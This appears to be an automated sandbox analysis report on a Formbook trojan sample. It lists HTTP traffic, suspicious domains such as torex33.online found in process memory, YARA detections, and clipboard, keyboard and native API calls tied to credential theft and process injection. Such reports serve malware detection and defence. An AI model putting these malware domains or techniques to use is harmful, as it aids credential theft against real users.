20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:35:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:35:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:36:45 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:36:47 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:36:50 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:36:52 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:36:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:37:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:37:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:37:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.000000000358C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://animekuid.xyz/7un9/?tpTd=4XOwgplivDvk/EZOubh
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Palcoconnector.net
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39J
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39J
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39JiqpfnJPBMT
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39Jiq
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39Ji
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=ns
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4131107461.000000000500D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.torex33.online
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4131107461.000000000500D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.torex33.online/hd7m/
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: RpcPing.exe, 00000005.00000002.4129603004.000000000491C000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.000000000421C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RpcPing.exe, 00000005.00000003.2073830461.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033%l
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.torex33.online&rand=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_s
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_hos
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_c
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.torex33.online&utm_medium=parking&utm_c
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.torex33.online&amp;reg_source=parking_auto
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C4E3 NtClose,2_2_0042C4E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
